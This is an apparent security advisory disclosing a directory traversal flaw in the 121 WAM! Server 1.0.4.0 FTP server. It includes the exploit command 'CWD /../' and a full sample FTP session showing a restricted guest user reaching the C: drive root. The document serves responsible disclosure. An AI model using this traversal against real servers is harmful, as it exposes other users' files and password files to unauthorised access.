Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0

Url: http://www.121software.com/121wam/server.asp

"Imagine if you could centralise the management of your FTP server farm and
give customers additional database management capability."

"121 WAM! Server is a standard FTP server for Microsoft Windows. When used 
in
conjunction with 121 WAM! Client, it also provides your users with a
complete solution to manage their online databases including Microsoft 
Access,
SQL Server and MySQL. 121 WAM! makes uploading, downloading and transferring
data a simple drag and drop operation. 121 WAM! Server is the first FTP 
server
that supports database transfer functionality."
- From the Vendor's Website

It is possible to leave the root directory assigned to a resitricted 
username
and download any file on the remote computer.
This can include, but is not limited to, the files of other users, and
password files on the main server.

Sending the command:

CWD ..

Will not change the directory, however:

CWD /../

Will allow a restricted user to 'hop' out of the pre-definied user root
directory, and browse the hard drive.

Sample Session:
===============
[ First I log in under 'guest', confined to directory 'c:\root' ]

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp 82.35.22.2
Connected to 82.35.22.2.
220- ***** ***** ***** *****
220- 121 WAM! Server Version 1. 0. 4. 0
220- Get 121 WAM! Client for extra functionalities
220- such as database operations
220- Check out http://www.121software.com
220- ***** ***** ***** *****
220 Welcome to 121 WAM! Server
User (82.35.22.2:(none)): guest
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> dir
200 Port command ok.
150 Ready to transfer data.
drwx------   2 owner nogroup               0 May 21 13:46 repd
-rwx------   1 owner nogroup           10462 May 17 21:13 help.htm
-rwx------   1 owner nogroup           75264 May 18 14:39 ralf4.exe
-rwx------   1 owner nogroup             805 May 17 16:20 README.txt
-rwx------   1 owner nogroup             439 May 17 15:32 SETUP.bat
drwx------   2 owner nogroup               0 Jun 05 23:32 conf
drwx------   2 owner nogroup               0 Jun 06 00:11 docs
drwx------   2 owner nogroup               0 Jun 18 23:20 images
226 File transfer complete.
ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.
ftp> cd ..
250 CWD command completed successfully.
ftp> dir
200 Port command ok.
150 Ready to transfer data.
drwx------   2 owner nogroup               0 May 21 13:46 repd
-rwx------   1 owner nogroup           10462 May 17 21:13 help.htm
-rwx------   1 owner nogroup           75264 May 18 14:39 ralf4.exe
-rwx------   1 owner nogroup             805 May 17 16:20 README.txt
-rwx------   1 owner nogroup             439 May 17 15:32 SETUP.bat
drwx------   2 owner nogroup               0 Jun 05 23:32 conf
drwx------   2 owner nogroup               0 Jun 06 00:11 docs
drwx------   2 owner nogroup               0 Jun 18 23:20 images
226 File transfer complete.
ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.

[ As you can see, a regular 'cd ..' won't allow me to leave my root dir. ]

ftp> cd /../
250 CWD command completed successfully.
ftp> dir
200 Port command ok.
150 Ready to transfer data.
drwx------   2 owner nogroup               0 May 10 16:18 WARM
drwx------   2 owner nogroup               0 Jul 15  2002 WINDOWS
drwx------   2 owner nogroup               0 Jul 15  2002 Documents and 
Settings
[snip ...]
drwx------   2 owner nogroup               0 Jul 15  2002 Program Files
-rwx------   1 owner nogroup               0 Jul 15  2002 CONFIG.SYS
-r-x------   1 owner nogroup            5517 Jul 15  2002 CLDMA.LOG
-rwx------   1 owner nogroup               0 Jul 31  2002 CONFIG.WIN
drwx------   2 owner nogroup               0 Sep 28  2002 perlsetup
[snip ...]
drwx------   2 owner nogroup               0 Jul 24 20:48 cygwin
-rwx------   1 owner nogroup          475136 Aug 29  2002 ASMEDIT
-rwx------   1 owner nogroup           17091 Sep 02  2002 gddreleasetemp
226 File transfer complete.
ftp: 17589 bytes received in 0.22Seconds 80.32Kbytes/sec.
ftp>

[ However, the 'cd /../' command got me straight to 'c:\'! ]


======================================================================


Operating system and servicepack level:
Windows 9x/Me/NT Based


Software:
121 WAM! Server 1.0.4.0 (Possibly previous versions)


Under what circumstances the vulnerability was discovered:
Under a vulnerability search.


If the vendor has been notified:
Yes, I think we can expect a patch some day soon :o)


How to contact you for further information:
I can always be reached at peter4020@hotmail.com


Please credit this find to:
Peter Winter-Smith


Thank you for your time,
-Peter

_________________________________________________________________
Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile